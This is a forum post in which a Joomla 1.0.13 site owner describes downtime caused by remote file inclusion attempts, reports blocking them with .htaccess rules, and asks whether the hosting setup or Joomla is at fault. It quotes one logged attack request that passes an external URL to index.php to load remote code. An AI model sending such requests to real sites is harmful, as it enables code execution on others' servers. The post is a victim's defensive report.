It know this post is a bit long but please take time to read it. I solved my problem but others might find this usefull. There still are some questions to be answered though. I have been looking around a bit and I found some posts that describe this kind of hack attempts but I believe they have not been discussed enough to give a proper solution. Maybe we can provide one in this thread.
First some of the facts, I just know you are going to ask them
PHP 5.2.5, Joomla version 1.0.13, register globals off, safe mode on, Allow_url_fopen is turned on and open_basedir
is set to none. I only use components that are found to be OK in the Vulnerability Checklist (the site got hacked with or without these components so they were of no importance to the problem I had)
Now for what happened:
My site had been going down a lot last month so I started contacting my hosting company (yeah, I'm on a Shared Server so sue me). After they assured me there were no server issues I was told a "locked" or "sleeping" php process caused the downtime.
First I installed the latest joomla update (1.0.12 to 1.0.13), later I even installed my entire site from scratch on a “fresh” 1.0.13 joomla, they all went down in no time.
Note: when I say down I mean that the site wont load. Phpmyadmin or my customer server configuration or a standard .html file are accessible but the php stuff does not work.
So I started reading this and other fora to find the solution and it did not take me long to find the wonderfull FAQs section with the Joomla! Administrator's Security Checklist. I tried to apply all recommendations to a brand new joomla 1.0.13 installation (no components!) and put the site back online with the standard .htaccess file enabled. Unfortunately, the site still went down.
When investigating deeper in my log files I found that indeed I was suffering from hack attempts. Php scripts, hosted on other domains were being called from my site.
Example:
- Code: Select all
IP-DATE-TIME "GET /index.php?option=http://EXTERNAL_URL/file.txt? HTTP/1.1" 200 33035 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
Some hack attempts were http coded 403 (thanks to the .htaccess file) but some still were code 200. Every time after these coded 200 hack attempts, the site got down (php hanging or sleeping?).
I solved this by adding more security to my .htaccess file using the RewriteCond’s and since then the site has been online all the time. If I look at my logs now, all attempts are blocked indeed.
Now I very much would like to know:
Is this a server config problem (as in: my Hosts problem)
Is this a Joomla core problem
I have other sites running on the same server but on other software such as Coppermine, OSCommerce and they are not affected by similar hack attempts.
For documentation of this problem I have some nice extracts from my log files with a lot of variations on how to call the external scripts and some of the actual scripts that were called upon (I put these in a pdf for security reasons). I would love to have a php-expert to take a look at these scripts and tell me what they actually do since php is not my cup of tea.
